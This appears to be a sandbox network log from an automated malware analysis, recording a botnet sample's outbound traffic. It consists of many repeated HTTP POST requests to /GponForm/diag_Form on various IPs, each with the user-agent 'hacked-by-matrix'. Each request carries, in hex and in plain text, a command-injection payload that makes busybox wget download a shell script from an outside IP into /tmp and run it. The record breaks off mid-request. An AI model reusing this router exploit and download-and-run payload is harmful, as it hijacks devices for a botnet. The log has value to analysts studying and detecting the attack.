                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2195192.168.2.1339478118.144.217.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888119936 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2196192.168.2.13440825.133.166.53443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888128996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2197192.168.2.1351632118.115.190.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888135910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2198192.168.2.1358650109.230.212.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888154030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2199192.168.2.1360184118.152.6.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888180017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2200192.168.2.1337774109.226.170.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888189077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2201192.168.2.133578042.16.96.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888207912 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2202192.168.2.1350782212.243.111.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888209105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2203192.168.2.1347342109.233.91.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888215065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2204192.168.2.13466705.183.202.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888238907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2205192.168.2.135356642.22.141.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888252974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2206192.168.2.1345336212.70.243.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888268948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2207192.168.2.1351768118.58.181.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888271093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2208192.168.2.1359488118.65.96.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888272047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2209192.168.2.1336712212.123.233.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888294935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2210192.168.2.13609025.134.176.240443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888320923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2211192.168.2.13374005.63.45.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888329983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2212192.168.2.135145442.252.154.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888346910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2213192.168.2.134664442.222.0.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888374090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2214192.168.2.1346722118.148.117.127443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888386965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2215192.168.2.134477642.7.32.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888396025 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2216192.168.2.1357206109.55.6.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888413906 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2217192.168.2.1337016109.167.9.51443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888413906 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
